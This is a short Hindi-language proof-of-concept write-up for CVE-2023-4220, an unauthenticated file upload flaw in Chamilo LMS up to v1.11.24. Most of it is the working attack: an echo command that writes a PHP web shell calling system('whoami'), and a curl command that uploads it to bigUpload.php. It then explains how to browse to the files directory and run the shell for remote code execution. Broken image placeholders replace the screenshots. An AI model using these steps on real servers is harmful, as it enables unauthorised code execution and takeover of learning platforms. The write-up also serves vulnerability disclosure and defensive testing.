
CVE-2023-4220 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण: Chamilo LMS में अप्रमाणित फ़ाइल अपलोड जो वेब शेल तैनाती के माध्यम से संग्रहीत XSS और दूरस्थ कोड निष्पादन सक्षम करता है।
बड़ी फ़ाइल अपलोड कार्यक्षमता में अप्रतिबंधित फ़ाइल अपलोड /main/inc/lib/javascript/bigupload/inc/bigUpload.php में Chamilo LMS <= v1.11.24 में अप्रमाणित हमलावरों को संग्रहीत क्रॉस-साइट स्क्रिप्टिंग हमले करने और वेब शेल अपलोड करके दूरस्थ कोड निष्पादन प्राप्त करने की अनुमति देता है।
बड़ी फ़ाइल अपलोड कार्यक्षमता /main/inc/lib/javascript/bigupload/inc/bigUpload.php द्वारा वेब रूट के अंतर्गत /main/inc/lib/javascript/bigupload/files निर्देशिका में मनमानी फ़ाइलें अपलोड करने की अनुमति देती है।
यदि /main/inc/lib/javascript/bigupload/files निर्देशिका मौजूद है तो हम मनमानी फ़ाइल अपलोड कर सकते हैं;
एक दुर्भावनापूर्ण php फ़ाइल बनाएँ echo '<?php system("whoami"); ?>' > dollarboysushil.php
.png)
फिर हम निम्नलिखित कमांड जारी करके इस फ़ाइल को अपलोड कर सकते हैं
`$ curl -F '[email protected]' 'http://<website>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'`
.png)
हम /main/inc/lib/javascript/bigupload/files निर्देशिका पर जाकर जांच सकते हैं कि हमारी फ़ाइल अपलोड हुई है या नहीं
.png)
और हम php फ़ाइल पर क्लिक करके इसे निष्पादित कर सकते हैं, जो whoami कमांड का आउटपुट देती है
.png)